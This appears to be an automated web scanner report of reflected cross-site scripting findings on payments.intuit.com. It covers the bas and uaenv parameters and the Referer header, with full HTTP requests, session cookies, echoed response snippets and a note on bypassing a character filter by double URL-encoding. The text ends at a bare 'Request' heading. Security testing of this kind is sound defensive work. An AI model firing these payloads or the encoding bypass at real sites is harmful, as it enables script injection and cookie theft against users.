The value of the bas request parameter is copied into a JavaScript rest-of-line comment. The payload 5917f%0aalert(1)//0f2714cf68b was submitted in the bas parameter. This input was echoed as 5917f alert(1)//0f2714cf68b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=card5917f%0aalert(1)//0f2714cf68b HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the bas request parameter is copied into an HTML comment. The payload d670a--><script>alert(1)</script>afe168cf1c was submitted in the bas parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardd670a--><script>alert(1)</script>afe168cf1c HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the bas request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd42"><script>alert(1)</script>c5a639cbe3e was submitted in the bas parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardfbd42"><script>alert(1)</script>c5a639cbe3e HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 100cc'%3balert(1)//21604655727 was submitted in the uaenv parameter. This input was echoed as 100cc';alert(1)//21604655727 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod100cc'%3balert(1)//21604655727&bas=card HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5165"%3balert(1)//11b088fde41 was submitted in the uaenv parameter. This input was echoed as c5165";alert(1)//11b088fde41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prodc5165"%3balert(1)//11b088fde41&bas=card HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5 was submitted in the Referer HTTP header. This input was echoed as 5deb3'-alert(1)-'ae164b743d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
...[SNIP]... <script> // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = '5deb3'-alert(1)-'ae164b743d5'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload b9588--><script>alert(1)</script>36da4f0cb8f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea6a'-alert(1)-'22e1363c582 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fdb'-alert(1)-'203a332f69f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 38475--><script>alert(1)</script>4d6c73c632 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=38475--><script>alert(1)</script>4d6c73c632
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74fca'-alert(1)-'5c9bded9b65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload a8e31--><script>alert(1)</script>c61fa29957 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=a8e31--><script>alert(1)</script>c61fa29957
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2b9'-alert(1)-'7fe9fab8e6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 23a44--><script>alert(1)</script>72e2675b5fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=23a44--><script>alert(1)</script>72e2675b5fc
The value of the Referer HTTP header is copied into an HTML comment. The payload 50367--><script>alert(1)</script>6c1e00f3f20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
